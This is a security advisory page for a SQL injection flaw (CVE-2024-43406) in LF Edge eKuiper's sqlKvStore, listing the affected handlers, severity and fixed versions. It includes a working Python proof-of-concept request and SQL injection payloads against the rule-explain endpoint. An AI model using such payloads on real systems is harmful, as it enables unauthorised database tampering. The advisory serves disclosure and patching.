Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1yNXBoLTRqeG0tNmo5cM4AA-0C
LF Edge eKuiper has a SQL Injection in sqlKvStore
Summary
A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore.
Details
I will use explainRuleHandler ("/rules/{name}/explain") as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc.
The SQL injection can happen in the code:
https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93
The code to accept user input is:
https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277
The rule id in the above code can be used to exploit SQL query.
Note that the delete function is also vulnerable:
https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141
PoC
import requests
from urllib.parse import quote
# SELECT val FROM 'xxx' WHERE key='%s';
payload = f"""'; ATTACH DATABASE 'test93' AS test93;
CREATE TABLE test93.pwn (dataz text);
INSERT INTO test93.pwn (dataz) VALUES ("sql injection");--"""
#payload = "deadbeef'; SELECT 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000000))));--"
url = f"http://127.0.0.1:9081/rules/{quote(payload,safe='')}/explain" # explainRuleHandler
res = requests.get(url)
print(res.content)
The screenshot shows the malicious SQL query to insert a value:
The screenshot shows the breakpoint of executing the query:
Impact
SQL Injection vulnerability
The reporters are Yuan Luo, Shuai Xiong, Haoyu Wang from Tencent YunDing Security Lab.
Permalink: https://github.com/advisories/GHSA-r5ph-4jxm-6j9pJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yNXBoLTRqeG0tNmo5cM4AA-0C
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 3 months ago
Updated: 3 months ago
CVSS Score: 8.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Identifiers: GHSA-r5ph-4jxm-6j9p, CVE-2024-43406
References:
- https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p
- https://nvd.nist.gov/vuln/detail/CVE-2024-43406
- https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503
- https://github.com/pypa/advisory-database/tree/main/vulns/ekuiper/PYSEC-2024-72.yaml
- https://github.com/advisories/GHSA-r5ph-4jxm-6j9p
Blast Radius: 5.3
Affected Packages
pypi:ekuiper
Dependent packages: 0Dependent repositories: 1
Downloads: 7,103 last month
Affected Version Ranges: >= 0, < 1.14.2
Fixed in: 1.14.2
All affected versions: 1.4.0, 1.4.1, 1.4.2, 1.4.3, 1.4.4, 1.5.0, 1.5.1, 1.6.0, 1.6.1, 1.6.2, 1.6.3, 1.7.0, 1.7.1, 1.7.2, 1.7.3, 1.7.4, 1.7.5, 1.7.6, 1.8.0, 1.8.1, 1.8.2, 1.9.0, 1.9.1, 1.9.2, 1.10.0, 1.10.1, 1.10.2, 1.11.0, 1.11.1, 1.11.2, 1.11.3, 1.11.4, 1.11.5, 1.12.0, 1.12.1, 1.12.2, 1.12.3, 1.12.4, 1.12.5, 1.12.6, 1.12.7, 1.12.8, 1.13.0, 1.13.1, 1.13.2, 1.13.3, 1.13.4, 1.13.5, 1.13.6, 1.14.0, 1.14.1
All unaffected versions: 1.14.2, 1.14.3, 1.14.4, 1.14.5, 1.14.6
go:github.com/lf-edge/ekuiper
Dependent packages: 1Dependent repositories: 4
Downloads:
Affected Version Ranges: < 1.14.2
Fixed in: 1.14.2
All affected versions: 1.14.0, 1.14.1
All unaffected versions: 1.14.2, 1.14.3, 1.14.4, 1.14.5, 1.14.6